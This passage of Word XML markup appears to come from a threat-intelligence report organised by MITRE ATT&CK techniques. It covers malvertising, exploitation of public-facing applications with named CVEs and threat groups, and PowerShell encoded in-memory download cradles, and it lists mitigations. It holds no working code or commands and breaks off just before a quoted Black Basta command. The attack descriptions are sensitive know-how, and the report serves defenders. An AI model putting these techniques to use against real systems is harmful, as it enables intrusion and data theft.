          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Malvertising + Exploit Kits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Purchase ad space on legitimate platforms to serve malicious ads. Redirect users to exploit kits (e.g., RIG, GrandSoft) that probe for unpatched browsers/plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Grandoreiro used Google Ads and compromised websites to distribute trojanized installers. The malware checked for outdated Java or Windows versions before deploying banking trojans 2. SocGholish masqueraded as browser updates to drop info-stealers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Update browsers/plugins and enable sandboxing (e.g., Chrome’s Site Isolation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Block ads/scripts with extensions (uBlock Origin) and disable browser push notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3) Technique: Exploit Public-Facing Application (T1190)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directly target vulnerabilities in internet-exposed services (e.g., web apps, VPNs, databases). Common weaknesses include unpatched software, misconfigurations, or flawe</w:t>
      </w:r>
      <w:r w:rsidR="00204DBF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>d authentication mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploiting Critical CVEs in Edge Devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Scan for public assets (e.g., Shodan.io) and exploit known vulnerabilities in firewalls, email servers, or cloud services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT41 exploited CVE-2020-10189 in Zoho ManageEngine Desktop Central (unsafe deserialization) to execute remote code. They later moved to cloud APIs after compromising the host 3. HAFNIUM chained ProxyLogon vulnerabilities (CVE-2021-26855, CVE-2021-27065) in Microsoft Exchange to steal emails and deploy web shells 310.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL Injection → Full System Takeover</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Inject malicious SQL queries via web forms to extract databases, escalate privileges, or execute OS commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 used SQL injection to breach energy sector networks, later pivoting to Active Directory via compromised credentials. FIN7 targeted e-commerce sites with SQLi to plant credit card skimmers 39. Sandworm Team exploited GE’s Cimplicity HMI software (CVE-2015-6490) to sabotage industrial control systems 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Patch within 24 hours for critical vulnerabilities (e.g., Log4j, Exchange CVEs).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00176A50" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Deploy web application firewalls (WAFs) to filter malicious inputs and segment public services in DMZs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176A50" w:rsidRDefault="00176A50" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00176A50" w:rsidRDefault="00176A50" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00176A50" w:rsidRDefault="00176A50" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00176A50" w:rsidRDefault="00176A50" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRPr="00264887" w:rsidRDefault="00204DBF" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRPr="00204DBF" w:rsidRDefault="00264887" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Execution</w:t>
      </w:r>
      <w:r w:rsidR="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204DBF" w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357590">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution involves techniques that result in adversary-controlled code running on local or remote systems. This tactic enables adversaries to explore networks, steal data, or achieve other objectives by executing malicious commands, scripts, or binaries. Adversaries often pair execution with other tactics (e.g., discovery, lateral movement) to expand their foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRDefault="00357590" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1) Technique: Command and Scripting Interpreter (T1059)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attackers use command-line interfaces and scripting environments to execute malicious commands, bypa</w:t>
      </w:r>
      <w:r w:rsidR="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ss controls, or automate tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4128B" w:rsidRDefault="00D4128B" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sub-technique: PowerShell (T1059.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Definition: Adversaries abuse PowerShell, a built-in Windows scripting environment, to execute commands, download payloads, evade defenses, and perform post-exploitation activities. PowerShell’s deep OS integration allows in-memory execution, bypassing disk-based detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In-Memory Payload Execution via Obfuscated Download Cradles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries use encoded PowerShell commands to fetch and execute payloads directly in memory. The -EncodedCommand flag decodes Base64 strings into executable scripts, while -WindowStyle Hidden hides the window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1494"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Black Basta ransomware executed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1494"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
